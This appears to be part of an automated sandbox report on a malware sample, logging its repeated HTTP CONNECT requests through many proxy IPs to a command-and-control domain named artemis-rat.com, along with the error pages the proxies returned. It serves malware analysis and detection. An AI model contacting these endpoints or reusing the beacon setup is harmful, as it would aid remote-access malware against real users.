                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2027192.168.2.552076217.145.199.47567463876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.651853085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2028192.168.2.552123195.211.219.14755553876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.652055025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.722996950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905137062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.922352076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2029192.168.2.555422148.66.130.18756303876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.653350115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.405126095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.594788074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2030192.168.2.554065161.97.163.52285933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.716696978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2031192.168.2.55516551.15.242.20288883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.717307091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.486942053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.780368090 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.21.6
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2032192.168.2.555167185.49.31.20780813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.739084005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2033192.168.2.55400362.171.131.101410553876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.740356922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2034192.168.2.55544945.11.95.16550283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.751038074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.487029076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.702132940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014588118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.385159016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2035192.168.2.554055148.72.212.18327923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.751970053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889324903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905153036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.905189991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2036192.168.2.55402651.83.190.248190503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.759493113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.852087975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905316114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.922368050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2037192.168.2.55398847.74.152.2988883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.773905993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.852170944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905332088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.922369957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2038192.168.2.55544793.126.56.3041533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.856772900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2039192.168.2.552153162.241.45.22449313876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.857086897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889448881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905191898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.905246973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2040192.168.2.55398120.193.135.50803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.882648945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:19.004070044 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:18 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:21.427016020 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:18 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
